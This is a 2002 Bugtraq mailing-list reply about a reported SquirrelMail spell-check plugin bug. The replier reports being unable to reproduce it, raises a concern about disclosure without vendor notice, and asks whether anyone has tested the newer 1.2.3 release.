Bugtraq mailing list archives

Re: squirrelmail bug

From: Adam Herscher <adam () xtime com>
Date: Thu, 24 Jan 2002 13:31:26 -0800 (PST)

I'm unable to repro on squirrelmail 1.2.2 + openbsd 2.9:

Fatal error: Call to undefined function: sqspell_getlang() in
/usr/local/www/htdocs/www2.axisproductions.com/webmail/plugins/squirrelspell/modules/check_me.mod.php
on line 59

I'm also curious how much notice this person gave to the Squirrelmail
development team to prepare a fix before releasing it to the world.. (same
thought applies to the random cross-scripting vulnerability just sent out
3 seconds ago)

On anothre note Squirrelmail 1.2.3 was released 01/21/02.. I was wondering
if anyone has had the opportunity to test against it.  This specific issue
doesn't seem to have been noted in the changelog:

http://www.squirrelmail.org/changelog.php

Attempted to contact off-list earlier, but it seems the sender's mx is
having problems.

<appelast () bsquad sm pl>:
213.134.128.227 does not like recipient.
Remote host said: 550 5.7.1 <appelast () bsquad sm pl>... Relaying denied
Giving up on 213.134.128.227.